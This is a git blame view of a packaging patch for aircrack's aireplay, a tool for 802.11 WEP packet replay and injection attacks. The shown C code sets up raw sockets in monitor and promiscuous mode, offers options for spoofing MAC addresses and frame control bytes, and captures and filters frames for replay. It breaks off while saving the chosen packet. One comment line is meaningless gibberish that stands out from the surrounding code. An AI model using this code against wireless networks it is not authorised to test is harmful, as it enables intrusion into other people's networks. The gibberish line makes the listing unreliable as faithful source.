]> git.pld-linux.org Git - packages/aircrack.git/blame - aircrack-aireplay.patch
projects / packages / aircrack.git / blame
? search:
summary | shortlog | log | commit | commitdiff | tree
blob | blame (incremental) | history | HEAD
- up to 2.41
[packages/aircrack.git] / aircrack-aireplay.patch
CommitLineData
68897318
GS		 1diff -urN aircrack-2.1.orig/aireplay.c aircrack-2.1/aireplay.c
2--- aircrack-2.1.orig/aireplay.c 2004-10-01 21:30:00.000000000 +0200
3+++ aircrack-2.1/aireplay.c 2005-04-22 08:51:21.932065120 +0200
4@@ -1,7 +1,9 @@
5 /*
6- * 802.11 WEP arp-requests replay attack
7+ * 802.11 WEP replay & injection attacks
8 *
9- * Copyright (C) 2004 Christophe Devine
10+ * Copyright (C) 2004,2005 Christophe Devine
11+ *
12+ * WEP decryption attack (chopchop) developped by KoreK
13 *
14 * This program is free software; you can redistribute it and/or modify
15 * it under the terms of the GNU General Public License as published by
16@@ -18,41 +20,105 @@
17 * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
18 */
19
20+#include <sys/types.h>
21 #include <netpacket/packet.h>
22+#include <linux/rtc.h>
23 #include <sys/ioctl.h>
24+#include <sys/wait.h>
25+#include <sys/stat.h>
26 #include <arpa/inet.h>
27+#include <pthread.h>
28 #include <net/if.h>
29 #include <unistd.h>
30 #include <signal.h>
31 #include <string.h>
32 #include <stdlib.h>
33 #include <stdio.h>
34+#include <fcntl.h>
35+#include <errno.h>
36 #include <time.h>
37
38-#include "pcap.h"
39+#include "pcap-aireplay.h"
40+#include "crctable.h"
41+
42+#define NULL_MAC "\x00\x00\x00\x00\x00\x00"
43
44 #ifndef ETH_P_ALL
45 #define ETH_P_ALL 3
46 #endif
47
48-#define BROADCAST_ADDR "\xFF\xFF\xFF\xFF\xFF\xFF"
49+#ifndef ETH_P_80211_RAW
50+#define ETH_P_80211_RAW 25
51+#endif
52+
53+#ifndef ARPHRD_IEEE80211
54+#define ARPHRD_IEEE80211 801
55+#endif
56+
57+#ifndef ARPHRD_IEEE80211_PRISM
58+#define ARPHRD_IEEE80211_PRISM 802
59+#endif
60
61 char usage[] =
62
63 "\n"
64-" aireplay 2.1 - (C) 2004 Christophe Devine\n"
65+" aireplay 2.2 - (C) 2004,2005 Christophe Devine\n"
66+"\n"
67+" usage: aireplay [options] <interface #0> [interface #1]\n"
68 "\n"
69-" usage: aireplay <wifi interface> <input filename> [bssid]\n"
70+" interface #0 is for sending packets; it is also used to\n"
71+" capture packets unless interface #1 is specified.\n"
72+"\n"
73+" source options:\n"
74+"\n"
75+" -i : capture packet on-the-fly (default)\n"
76+" -r file : extract packet from this pcap file\n"
77+"\n"
78+" filter options:\n"
79+"\n"
80+" -b bssid : MAC address, Access Point\n"
81+" -d dmac : MAC address, Destination\n"
82+" -s smac : MAC address, Source\n"
83+" -m len : minimum packet length, default: 40\n"
84+" -n len : maximum packet length, default: 512\n"
85+" -u type : fc, type - default: 2 = data\n"
86+" -v subt : fc, subtype - default: 0 = normal\n"
87+" -t tods : fc, To DS bit - default: any\n"
88+" -f fromds : fc, From DS bit - default: any\n"
89+" -w iswep : fc, WEP bit - default: 1\n"
90+" -y : assume yes & don't save packet\n"
91+"\n"
92+" replay options:\n"
93+"\n"
94+" -x nbpps : number of packets per second\n"
95+" -a bssid : set Access Point MAC address\n"
96+" -c dmac : set Destination MAC address\n"
97+" -h smac : set Source MAC address\n"
98+" -o fc0 : set frame control[0] (hex)\n"
99+" -p fc1 : set frame control[1] (hex)\n"
100+" -k : turn chopchop attack on\n"
101 "\n";
102
103-unsigned char buffer[65536];
104-
105-struct __packet
106+struct options
107 {
108- unsigned int length;
109- unsigned char *data;
110-}
111-arp_packets[4096];
112+ unsigned char *s_file;
113+
114+ unsigned char f_bssid[6];
115+ unsigned char f_smac[6];
116+ unsigned char f_dmac[6];
117+ int f_minlen, f_maxlen;
118+ int f_type, f_subtype;
119+ int f_fromds, f_tods, f_iswep;
120+ int assume_yes;
121+
122+ unsigned char r_bssid[6];
123+ unsigned char r_smac[6];
124+ unsigned char r_dmac[6];
125+ int r_fc_0, r_fc_1;
126+ int nbpps, do_chopchop;
127+};
128+
129+char *wlanng_dev = NULL;
130
131 int do_exit = 0;
132
133@@ -60,295 +126,1370 @@
134 {
135 if( signum == SIGINT || signum == SIGTERM )
136 do_exit = 1;
137+
138+ if( signum == SIGALRM )
139+ do_exit = 2;
140 }
141
142-int main( int argc, char *argv[] )
143+/* CRC checksum verification routine */
144+
145+int check_crc_buf( unsigned char *buf, int len )
146 {
147- FILE *f_cap;
148+ unsigned long crc = 0xFFFFFFFF;
149
150- char *s;
151- int bssid_set;
152- long cnt1, cnt2;
153- int i, n, raw_sock;
154- unsigned char *h80211;
155- unsigned char bssid[6];
156+ for( ; len > 0; len--, buf++ )
157+ crc = crc_tbl[(crc ^ *buf) & 0xFF] ^ ( crc >> 8 );
158+
159+ return( ~crc == *((unsigned long *) buf) );
160+}
161+
162+/* MAC address parsing routine */
163+
164+int getmac( char *s, unsigned char *mac )
165+{
166+ int i = 0, n;
167+
168+ while( sscanf( s, "%x", &n ) == 1 )
169+ {
170+ if( n < 0 || n > 255 )
171+ return( 1 );
172+
173+ mac[i] = n;
174
175+ if( ++i == 6 ) break;
176+
177+ if( ! ( s = strchr( s, ':' ) ) )
178+ break;
179+
180+ s++;
181+ }
182+
183+ return( i != 6 );
184+}
185+
186+/* interface initialization routine */
187+
188+int openraw( char *iface, int fd, int *arptype )
189+{
190 struct ifreq ifr;
191+ struct packet_mreq mr;
192 struct sockaddr_ll sll;
193- struct pcap_file_header pfh;
194- struct pcap_pkthdr pkh;
195- time_t tm_prev;
196+
197+ /* find the interface index */
198
199- /* create the raw socket */
200+ memset( &ifr, 0, sizeof( ifr ) );
201+ strncpy( ifr.ifr_name, iface, sizeof( ifr.ifr_name ) - 1 );
202
203- if( ( raw_sock = socket( PF_PACKET, SOCK_RAW,
204- htons( ETH_P_ALL ) ) ) < 0 )
205+ if( ioctl( fd, SIOCGIFINDEX, &ifr ) < 0 )
206 {
207- perror( "socket(PF_PACKET)" );
208+ perror( "ioctl(SIOCGIFINDEX)" );
209 return( 1 );
210 }
211
212- /* drop privileges */
213+ /* bind the raw socket to the interface */
214
215- setuid( getuid() );
216+ memset( &sll, 0, sizeof( sll ) );
217+ sll.sll_family = AF_PACKET;
218+ sll.sll_ifindex = ifr.ifr_ifindex;
219+ if( wlanng_dev )
220+ sll.sll_protocol = htons( ETH_P_80211_RAW );
221+ else
222+ sll.sll_protocol = htons( ETH_P_ALL );
223
224- /* check the arguments */
225+ if( bind( fd, (struct sockaddr *) &sll,
226+ sizeof( sll ) ) < 0 )
227+ {
228+ perror( "bind(ETH_P_ALL)" );
229+ return( 1 );
230+ }
231+
232+ /* lookup the hardware type */
233
234- if( argc < 3 || argc > 4 )
235+ if( ioctl( fd, SIOCGIFHWADDR, &ifr ) < 0 )
236 {
237- usage:
238- printf( usage );
239+ perror( "ioctl(SIOCGIFHWADDR)" );
240 return( 1 );
241 }
242
243- bssid_set = 0;
244+ if( ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211 &&
245+ ifr.ifr_hwaddr.sa_family != ARPHRD_IEEE80211_PRISM )
246+ {
247+ fprintf( stderr, "unsupported hardware link type %d\n"
248+ "(expected ARPHRD_IEEE80211{,PRISM})\n",
249+ ifr.ifr_hwaddr.sa_family );
250+ fprintf( stderr, "make sure the interface is in Monitor mode\n" );
251+ return( 1 );
252+ }
253+
254+ *arptype = ifr.ifr_hwaddr.sa_family;
255+
256+ /* enable promiscuous mode */
257
258- if( argc == 4 )
259+ memset( &mr, 0, sizeof( mr ) );
260+ mr.mr_ifindex = sll.sll_ifindex;
261+ mr.mr_type = PACKET_MR_PROMISC;
262+
263+ if( setsockopt( fd, SOL_PACKET, PACKET_ADD_MEMBERSHIP,
264+ &mr, sizeof( mr ) ) < 0 )
265 {
266- i = 0;
267- s = optarg;
268+ perror( "setsockopt(PACKET_MR_PROMISC)" );
269+ return( 1 );
270+ }
271
272- while( sscanf( s, "%x", &n ) == 1 )
273- {
274- if( n < 0 || n > 255 )
275- goto usage;
276+ return( 0 );
277+}
278+
279+/* wlanng-aware frame sending routing */
280+
281+unsigned char tmpbuf[4096];
282
283- bssid[i] = n;
284+int send_frame( int fd, void *buf, size_t count )
285+{
286+ if( wlanng_dev )
287+ {
288+ if( ( ((unsigned char *) buf)[0] & 3 ) != 3 )
289+ {
290+ memcpy( tmpbuf, buf, 24 );
291+ memset( tmpbuf + 24, 0, 22 );
292
293- if( ++i == 6 ) break;
294+ tmpbuf[30] = ( count - 24 ) & 0xFF;
295+ tmpbuf[31] = ( count - 24 ) >> 8;
296
297- if( ! ( s = strchr( s, ':' ) ) )
298- break;
299+ memcpy( tmpbuf + 46, buf + 24, count - 24 );
300
301- s++;
302+ count += 22;
303 }
304+ else
305+ {
306+ memcpy( tmpbuf, buf, 30 );
307+ memset( tmpbuf + 30, 0, 16 );
308+
309+ tmpbuf[30] = ( count - 30 ) & 0xFF;
310+ tmpbuf[31] = ( count - 30 ) >> 8;
311
312- if( i != 6 ) goto usage;
313+ memcpy( tmpbuf + 46, buf + 30, count - 30 );
314+
315+ count += 16;
316+ }
317
318- bssid_set = 1;
319+ buf = tmpbuf;
320 }
321
322- if( argc - optind != 2 )
323- goto usage;
324+ return( write( fd, buf, count ) < 0 );
325+}
326+
327+int main( int argc, char *argv[] )
328+{
329+ time_t tt;
330+ int i, j, n, z;
331+ int fd_rtc, caplen;
332+ int fd_in, arptype_in;
333+ int fd_out, arptype_out;
334+ int i_bssid, i_smac, i_dmac;
335+ int data_start, data_end;
336+ int guess, is_deauth_mode;
337+
338+ unsigned long ticks[4];
339+ unsigned long crc_mask;
340+ unsigned long nb_pkt_read;
341+ unsigned long nb_pkt_sent;
342+
343+ char tmp_str[256];
344+
345+ unsigned char buffer[4096];
346+ unsigned char *h80211;
347+ unsigned char *savebuf;
348+ unsigned char *chopped;
349+
350+ FILE *f_cap_in = NULL;
351+ FILE *f_cap_out = NULL;
352+
353+ struct tm *lt;
354+ struct timeval tv;
355+ struct options opt;
356+ struct pcap_file_header pfh;
357+ struct pcap_pkthdr pkh;
358
359- if( strcmp( argv[optind], "wlan0ap" ) &&
360- strcmp( argv[optind], "wlan1ap" ) &&
361- strcmp( argv[optind], "wlan2ap" ) )
362+ fd_set rfds;
363+
364+ /* create i/o raw sockets and open /dev/rtc */
365+
366+ if( ( fd_in = socket( PF_PACKET, SOCK_RAW,
367+ htons( ETH_P_ALL ) ) ) < 0 )
368 {
369- fprintf( stderr, "This program only works with HostAP's "
370- "wlan#ap interface.\n" );
371+ perror( "socket(PF_PACKET)" );
372 return( 1 );
373 }
374
375- /* open the input file and check the pcap header */
376-
377- if( ( f_cap = fopen( argv[optind + 1], "rb" ) ) == NULL )
378+ if( ( fd_out = socket( PF_PACKET, SOCK_RAW,
379+ htons( ETH_P_ALL ) ) ) < 0 )
380 {
381- perror( "open" );
382+ perror( "socket(PF_PACKET)" );
383 return( 1 );
384 }
385
386- n = sizeof( struct pcap_file_header );
387-
388- if( fread( &pfh, 1, n, f_cap ) != (size_t) n )
389+ if( ( fd_rtc = open( "/dev/rtc", O_RDONLY ) ) < 0 )
390 {
391- perror( "read(pcap header)" );
392+ perror( "open(/dev/rtc)" );
393 return( 1 );
394 }
395
396- if( pfh.magic != TCPDUMP_MAGIC )
397+ if( ioctl( fd_rtc, RTC_IRQP_SET, 4096 ) < 0 )
398 {
399- fprintf( stderr, "wrong magic from pcap file header\n"
400- "(got 0x%08X, expected 0x%08X)\n",
401- pfh.magic, TCPDUMP_MAGIC );
402+ perror( "ioctl(RTC_IRQP_SET)" );
403+ printf( "Make sure you have enhanced rtc support in your kernel\n"
404+ "(module rtc) and that CONFIG_HPET_RTC_IRQ is disabled.\n" );
405 return( 1 );
406 }
407
408- if( pfh.linktype != LINKTYPE_IEEE802_11 &&
409- pfh.linktype != LINKTYPE_PRISM_HEADER )
410+ if( ioctl( fd_rtc, RTC_PIE_ON, 0 ) < 0 )
411 {
412- fprintf( stderr, "unsupported pcap header linktype %d\n",
413- pfh.linktype );
414+ perror( "ioctl(RTC_PIE_ON)" );
415 return( 1 );
416 }
417
418- /* find the interface index */
419+ /* drop privileges */
420
421- memset( &ifr, 0, sizeof( ifr ) );
422- strncpy( ifr.ifr_name, argv[optind], sizeof( ifr.ifr_name ) - 1 );
423+ setuid( getuid() );
424+
425+ /* check the arguments */
426+
427+ memset( &opt, 0, sizeof( opt ) );
428+
429+ opt.f_minlen = 40;
430+ opt.f_maxlen = 512;
431+ opt.f_type = 2;
432+ opt.f_subtype = 0;
433+ opt.f_tods = -1;
434+ opt.f_fromds = -1;
435+ opt.f_iswep = 1;
436+ opt.r_fc_0 = -1;
437+ opt.r_fc_1 = -1;
438
439- if( ioctl( raw_sock, SIOCGIFINDEX, &ifr ) < 0 )
440+ while( 1 )
441 {
442- perror( "ioctl(SIOCGIFINDEX)" );
443- return( 1 );
444+ int option = getopt( argc, argv,
445+ "ir:b:d:s:m:n:u:v:t:f:w:yx:a:c:h:o:p:k" );
446+
447+ if( option < 0 ) break;
448+
449+ switch( option )
450+ {
451+ case 'i' : break;
452+
453+ case 'r' : if( opt.s_file != NULL )
454+ {
455+ printf( "Packet source file already specified.\n" );
456+ return( 1 );
457+ }
458+ opt.s_file = optarg;
459+ break;
460+
461+ case 'b' : if( getmac( optarg, opt.f_bssid ) != 0 )
462+ {
463+ printf( "Invalid AP MAC address.\n" );
464+ return( 1 );
465+ }
466+ break;
467+
468+ case 'd' : if( getmac( optarg, opt.f_dmac ) != 0 )
469+ {
470+ printf( "Invalid destination MAC address.\n" );
471+ return( 1 );
472+ }
473+ break;
474+
475+ case 's' : if( getmac( optarg, opt.f_smac ) != 0 )
476+ {
477+ printf( "Invalid source MAC address.\n" );
478+ return( 1 );
479+ }
480+ break;
481+
482+ case 'm' : sscanf( optarg, "%d", &opt.f_minlen );
483+ if( opt.f_minlen < 0 )
484+ {
485+ printf( "Invalid minimum length filter.\n" );
486+ return( 1 );
487+ }
488+ break;
489+
490+ case 'n' : sscanf( optarg, "%d", &opt.f_maxlen );
491+ if( opt.f_maxlen < 0 )
492+ {
493+ printf( "Invalid maximum length filter.\n" );
494+ return( 1 );
495+ }
496+ break;
497+
498+ case 'u' : sscanf( optarg, "%d", &opt.f_type );
499+ if( opt.f_type < 0 || opt.f_type > 3 )
500+ {
501+ printf( "Invalid type filter.\n" );
502+ return( 1 );
503+ }
504+ break;
505+
506+ case 'v' : sscanf( optarg, "%d", &opt.f_subtype );
507+ if( opt.f_subtype < 0 || opt.f_subtype > 15 )
508+ {
509+ printf( "Invalid subtype filter.\n" );
510+ return( 1 );
511+ }
512+ break;
513+
514+ case 't' : sscanf( optarg, "%d", &opt.f_tods );
515+ if( opt.f_tods != 0 && opt.f_tods != 1 )
516+ {
517+ printf( "Invalid tods filter.\n" );
518+ return( 1 );
519+ }
520+ break;
521+
522+ case 'f' : sscanf( optarg, "%d", &opt.f_fromds );
523+ if( opt.f_fromds != 0 && opt.f_fromds != 1 )
524+ {
525+ printf( "Invalid fromds filter.\n" );
526+ return( 1 );
527+ }
528+ break;
529+
530+ case 'w' : sscanf( optarg, "%d", &opt.f_iswep );
531+ if( opt.f_iswep != 0 && opt.f_iswep != 1 )
532+ {
533+ printf( "Invalid wep filter.\n" );
534+ return( 1 );
535+ }
536+ break;
537+
538+ case 'y' : opt.assume_yes = 1; break;
539+
540+ case 'x' : sscanf( optarg, "%d", &opt.nbpps );
541+ if( opt.nbpps < 1 || opt.nbpps > 4096 )
542+ {
543+ printf( "Invalid number of packets per second.\n" );
544+ return( 1 );
545+ }
546+ break;
547+
548+ case 'a' : if( getmac( optarg, opt.r_bssid ) != 0 )
549+ {
550+ printf( "Invalid AP MAC address.\n" );
551+ return( 1 );
552+ }
553+ break;
554+
555+ case 'c' : if( getmac( optarg, opt.r_dmac ) != 0 )
556+ {
557+ printf( "Invalid destination MAC address.\n" );
558+ return( 1 );
559+ }
560+ break;
561+
562+ case 'h' : if( getmac( optarg, opt.r_smac ) != 0 )
563+ {
564+ printf( "Invalid source MAC address.\n" );
565+ return( 1 );
566+ }
567+ break;
568+
569+ case 'o' : sscanf( optarg, "%x", &opt.r_fc_0 );
570+ if( opt.r_fc_0 < 0 || opt.r_fc_0 > 255 )
571+ {
572+ printf( "Invalid frame control byte #0.\n" );
573+ return( 1 );
574+ }
575+ break;
576+
577+ case 'p' : sscanf( optarg, "%x", &opt.r_fc_1 );
578+ if( opt.r_fc_1 < 0 || opt.r_fc_1 > 255 )
579+ {
580+ printf( "Invalid frame control byte #1.\n" );
581+ return( 1 );
582+ }
583+ break;
584+
585+ case 'k' : opt.do_chopchop = 1; break;
586+
587+ default : goto usage; break;
588+ }
589 }
590
591- /* bind the raw socket to the interface */
592+ if( argc - optind < 1 || argc - optind > 2 )
593+ {
594+ usage:
595+ printf( usage );
596+ return( 1 );
597+ }
598
599- memset( &sll, 0, sizeof( sll ) );
600- sll.sll_family = AF_PACKET;
601- sll.sll_ifindex = ifr.ifr_ifindex;
602- sll.sll_protocol = htons( ETH_P_ALL );
603+ if( opt.f_minlen > opt.f_maxlen )
604+ {
605+ printf( "Invalid length filter (%d > %d).\n",
606+ opt.f_minlen, opt.f_maxlen );
607+ return( 1 );
608+ }
609
610- if( bind( raw_sock, (struct sockaddr *) &sll,
611- sizeof( sll ) ) < 0 )
612+ if( opt.nbpps == 0 )
613 {
614- perror( "bind(ETH_P_ALL)" );
615+ opt.nbpps = 256;
616+ printf( "Option -x not specified, assuming %d.\n",
617+ opt.nbpps );
618+ }
619+
620+ if( memcmp( argv[optind], "wlan", 4 ) == 0 )
621+ wlanng_dev = argv[optind];
622+
623+ if( openraw( argv[optind], fd_out, &arptype_out ) != 0 )
624 return( 1 );
625+
626+ /* open the packet source */
627+
628+ if( argc - optind == 2 )
629+ {
630+ if( openraw( argv[argc - 1], fd_in, &arptype_in ) != 0 )
631+ return( 1 );
632+ }
633+ else
634+ {
635+ fd_in = fd_out;
636+ arptype_in = arptype_out;
637+ }
638+
639+ if( opt.s_file != NULL )
640+ {
641+ if( ! ( f_cap_in = fopen( opt.s_file, "rb" ) ) )
642+ {
643+ perror( "open" );
644+ return( 1 );
645+ }
646+
647+ n = sizeof( struct pcap_file_header );
648+
649+ if( fread( &pfh, 1, n, f_cap_in ) != (size_t) n )
650+ {
651+ perror( "fread(pcap file header)" );
652+ return( 1 );
653+ }
654+
655+ if( pfh.magic != TCPDUMP_MAGIC &&
656+ pfh.magic != TCPDUMP_CIGAM )
657+ {
658+ fprintf( stderr, "wrong magic from pcap file header\n" );
659+ return( 1 );
660+ }
661+
662+ if( pfh.magic == TCPDUMP_CIGAM )
663+ SWAP32(pfh.linktype);
664+
665+ if( pfh.linktype != LINKTYPE_IEEE802_11 &&
666+ pfh.linktype != LINKTYPE_PRISM_HEADER )
667+ {
668+ fprintf( stderr, "'%s' is not a 802.11 capture file.\n",
669+ opt.s_file );
670+ return( 1 );
671+ }
672 }
673
674- signal( SIGINT, sighandler );
675+ /* look for replay-able packets */
676
677- tm_prev = time( NULL );
678+ signal( SIGINT, sighandler );
679+ signal( SIGTERM, sighandler );
680
681- cnt1 = cnt2 = 0;
682+ nb_pkt_read = 0;
683
684- /* search for potentially usable packets */
685+ tt = time( NULL );
686
687 while( 1 )
688 {
689- if( do_exit ) break;
690+ if( do_exit )
691+ {
692+ printf( "exiting.\n" );
693+ return( 1 );
694+ }
695
696- if( time( NULL ) - tm_prev >= 1 )
697+ if( time( NULL ) - tt >= 1 )
698 {
699- tm_prev = time( NULL );
700- printf( "\r\33[1KRead %ld packets, got %ld "
701- "potential ARP packets\r", cnt1, cnt2 );
702+ tt = time( NULL );
703+ printf( "\rSeen %ld packets...\33[K", nb_pkt_read );
704 fflush( stdout );
705 }
706
707- /* read one packet */
708+ caplen = 0;
709
710- n = sizeof( pkh );
711+ if( opt.s_file == NULL )
712+ {
713+ /* capture one packet */
714
715- if( fread( &pkh, 1, n, f_cap ) != (size_t) n )
716- break;
717+ FD_ZERO( &rfds );
718+ FD_SET( fd_in, &rfds );
719
720- if( pkh.len != pkh.caplen )
721- continue;
722+ tv.tv_sec = 1;
723+ tv.tv_usec = 0;
724
725- n = pkh.caplen;
726+ if( select( fd_in + 1, &rfds, NULL, NULL, NULL ) < 0 )
727+ {
728+ if( errno == EINTR ) continue;
729+ perror( "select" );
730+ return( 1 );
731+ }
732
733- if( fread( buffer, 1, n, f_cap ) != (size_t) n )
734- break;
735+ if( ! FD_ISSET( fd_in, &rfds ) )
736+ continue;
737
738- cnt1++;
739+ /* one packet available for reading */
740
741- h80211 = buffer;
742+ gettimeofday( &tv, NULL );
743+
744+ memset( buffer, 0, 2048 );
745
746- if( pfh.linktype == LINKTYPE_PRISM_HEADER )
747+ if( ( caplen = read( fd_in, buffer,
748+ sizeof( buffer ) ) ) < 0 )
749+ {
750+ perror( "read" );
751+ return( 1 );
752+ }
753+
754+ /* if device is an atheros, remove the FCS */
755+
756+ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
757+ caplen -= 4;
758+ }
759+ else
760 {
761- /* remove the prism header if necessary */
762+ /* read one packet */
763
764- n = *(int *)( h80211 + 4 );
765+ n = sizeof( pkh );
766
767- if( n < 8 || n >= (int) pkh.len )
768+ if( fread( &pkh, 1, n, f_cap_in ) != (size_t) n )
769+ {
770+ printf( "\rSeen %ld packets...EOF.\n",
771+ nb_pkt_read );
772+ return( 1 );
773+ }
774+
775+ if( pfh.magic == TCPDUMP_CIGAM )
776+ SWAP32( pkh.caplen );
777+
778+ n = caplen = pkh.caplen;
779+
780+ if( fread( buffer, 1, n, f_cap_in ) != (size_t) n )
781+ {
782+ printf( "\rSeen %ld packets...EOF.\n",
783+ nb_pkt_read );
784+ return( 1 );
785+ }
786+ }
787+
788+ nb_pkt_read++;
789+
790+ /* skip the prism header if present */
791+
792+ h80211 = buffer;
793+
794+ if( ( opt.s_file == NULL && arptype_in == ARPHRD_IEEE80211_PRISM ) ||
795+ ( opt.s_file != NULL && pfh.linktype == LINKTYPE_PRISM_HEADER ) )
796+ {
797+ n = *(int *)( buffer + 4 );
798+
799+ if( n < 8 || n >= (int) caplen )
800 continue;
801
802- h80211 += n; pkh.len -= n;
803+ h80211 += n;
804+ caplen -= n;
805 }
806
807- /* check if it's an encrypted data packet */
808+ /* check length */
809+
810+ if( caplen < opt.f_minlen ||
811+ caplen > opt.f_maxlen ) continue;
812
813- if( pkh.len < 40 ) continue;
814+ /* check the frame control bytes */
815
816- if( ( h80211[0] & 0x0C ) != 0x08 ) continue;
817- if( ( h80211[1] & 0x40 ) != 0x40 ) continue;
818+ if( ( h80211[0] & 0x0C ) != ( opt.f_type << 2 ) &&
819+ opt.f_type >= 0 ) continue;
820
821- /* also check the BSSID and KeyID */
822+ if( ( h80211[0] & 0xF0 ) != ( opt.f_subtype << 4 ) &&
823+ opt.f_subtype >= 0 ) continue;
824+
825+ if( ( h80211[1] & 0x01 ) != ( opt.f_tods ) &&
826+ opt.f_tods >= 0 ) continue;
827+
828+ if( ( h80211[1] & 0x02 ) != ( opt.f_fromds << 1 ) &&
829+ opt.f_fromds >= 0 ) continue;
830+
831+ if( ( h80211[1] & 0x40 ) != ( opt.f_iswep << 6 ) &&
832+ opt.f_iswep >= 0 ) continue;
833+
834+ /* check the extended IV (TKIP) flag */
835+
836+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
837+
838+ if( opt.f_type == 2 && opt.f_iswep == 1 &&
839+ ( h80211[z + 3] & 0x20 ) != 0 ) continue;
840+
841+ /* MAC address checking */
842
843 switch( h80211[1] & 3 )
844 {
845- case 0: i = 16; break; /* DA, SA, (BSSID) */
846- case 1: i = 4; break; /* (BSSID), SA, DA */
847- case 2: i = 10; break; /* DA, (BSSID), SA */
848- default: i = 4; break; /* (RA), TA, DA, SA */
849+ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
850+ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
851+ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
852+ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
853 }
854
855- if( bssid_set == 0 )
856+ if( memcmp( opt.f_bssid, NULL_MAC, 6 ) != 0 )
857+ if( memcmp( h80211 + i_bssid, opt.f_bssid, 6 ) != 0 )
858+ continue;
859+
860+ if( memcmp( opt.f_smac, NULL_MAC, 6 ) != 0 )
861+ if( memcmp( h80211 + i_smac, opt.f_smac, 6 ) != 0 )
862+ continue;
863+
864+ if( memcmp( opt.f_dmac, NULL_MAC, 6 ) != 0 )
865+ if( memcmp( h80211 + i_dmac, opt.f_dmac, 6 ) != 0 )
866+ continue;
867+
868+ /* this one looks good */
869+
870+ printf( "\n\n Size: %d, FromDS: %d, ToDS: %d\n",
871+ caplen, ( h80211[1] & 2 ) >> 1, ( h80211[1] & 1 ) );
872+ printf( " BSSID = %02X:%02X:%02X:%02X:%02X:%02X\n",
873+ h80211[i_bssid ], h80211[i_bssid + 1],
874+ h80211[i_bssid + 2], h80211[i_bssid + 3],
875+ h80211[i_bssid + 4], h80211[i_bssid + 5] );
876+ printf( " Src. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
877+ h80211[i_smac ], h80211[i_smac + 1],
878+ h80211[i_smac + 2], h80211[i_smac + 3],
879+ h80211[i_smac + 4], h80211[i_smac + 5] );
880+ printf( " Dst. MAC = %02X:%02X:%02X:%02X:%02X:%02X\n",
881+ h80211[i_dmac ], h80211[i_dmac + 1],
882+ h80211[i_dmac + 2], h80211[i_dmac + 3],
883+ h80211[i_dmac + 4], h80211[i_dmac + 5] );
884+
885+ /* Flurble gronk bloopit, bnip Frundletrune! */
886+
887+ for( i = 0; i < caplen; i++ )
888 {
889- bssid_set = 1;
890+ if( ( i & 15 ) == 0 )
891+ {
892+ if( i == 256 )
893+ {
894+ printf( "\n --- CUT ---" );
895+ break;
896+ }
897+
898+ printf( "\n 0x%04x: ", i );
899+ }
900
901- memcpy( bssid, h80211 + i, 6 );
902+ printf( "%02x", h80211[i] );
903+
904+ if( ( i & 1 ) != 0 )
905+ printf( " " );
906+
907+ if( i == caplen - 1 && ( ( i + 1 ) & 15 ) != 0 )
908+ {
909+ for( j = ( ( i + 1 ) & 15 ); j < 16; j++ )
910+ {
911+ printf( " " );
912+ if( ( j & 1 ) != 0 )
913+ printf( " " );
914+ }
915+
916+ printf( " " );
917+
918+ for( j = 16 - ( ( i + 1 ) & 15 ); j < 16; j++ )
919+ printf( "%c", ( h80211[i - 15 + j] < 32 ||
920+ h80211[i - 15 + j] > 126 )
921+ ? '.' : h80211[i - 15 + j] );
922+ }
923
924- printf( "\33[2KChoosing first encrypted BSSID"
925- " = %02X:%02X:%02X:%02X:%02X:%02X\n",
926- bssid[0], bssid[1], bssid[2],
927- bssid[3], bssid[4], bssid[5] );
928+ if( i > 0 && ( ( i + 1 ) & 15 ) == 0 )
929+ {
930+ printf( " " );
931+
932+ for( j = 0; j < 16; j++ )
933+ printf( "%c", ( h80211[i - 15 + j] < 32 ||
934+ h80211[i - 15 + j] > 127 )
935+ ? '.' : h80211[i - 15 + j] );
936+ }
937 }
938- else
939- if( memcmp( bssid, h80211 + i, 6 ) )
940- continue;
941
942- /* finally check the packet length & broadcast address */
943+ printf( "\n\n" );
944
945- switch( h80211[1] & 3 )
946+ if( opt.assume_yes )
947+ break;
948+
949+ printf( "Use this packet ? " );
950+
951+ fflush( stdout );
952+ signal( SIGINT, SIG_DFL );
953+ scanf( "%s", tmp_str );
954+ signal( SIGINT, sighandler );
955+ printf( "\n" );
956+
957+ if( tmp_str[0] == 'y' || tmp_str[0] == 'Y' )
958+ break;
959+ }
960+
961+ /* save the selected packet */
962+
963+ pfh.magic = TCPDUMP_MAGIC;
964+ pfh.version_major = PCAP_VERSION_MAJOR;
965+ pfh.version_minor = PCAP_VERSION_MINOR;
966+ pfh.thiszone = 0;
967+ pfh.sigfigs = 0;
968+ pfh.snaplen = 65535;
969+ pfh.linktype = LINKTYPE_IEEE802_11;
970+
971+ pkh.tv_sec = tv.tv_sec;
972+ pkh.tv_usec = tv.tv_usec;
973+ pkh.caplen = caplen;
974+ pkh.len = caplen;
975+
976+ lt = localtime( &tv.tv_sec );
977+
978+ if( ! opt.assume_yes )
979+ {
980+ sprintf( tmp_str, "replay_src-%02d%02d%02d-%02d%02d%02d.cap",
981+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
982+ lt->tm_hour, lt->tm_min, lt->tm_sec );
983+
984+ printf( "Saving chosen packet in %s\n\n", tmp_str );
985+
986+ n = sizeof( struct pcap_file_header );
987+
988+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
989 {
990- case 0: i = 4; break; /* (DA), SA, BSSID */
991- case 1: i = 16; break; /* BSSID, SA, (DA) */
992- case 2: i = 4; break; /* (DA), BSSID, SA */
993- default: i = 16; break; /* RA, TA, (DA), SA */
994+ perror( "fopen(pcap output,wb+)" );
995+ return( 1 );
996 }
997
998- if( pkh.len + ( h80211[27] & 0x3F ) != 0x44 ||
999- memcmp( h80211 + i, BROADCAST_ADDR, 6 ) )
1000- continue;
1001+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
1002+ {
1003+ perror( "fwrite(pcap file header)\n" );
1004+ return( 1 );
1005+ }
1006
1007- /* ok, this packet may be replayed */
1008+ n = sizeof( pkh );
1009
1010- arp_packets[cnt2].length = pkh.len;
1011+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
1012+ {
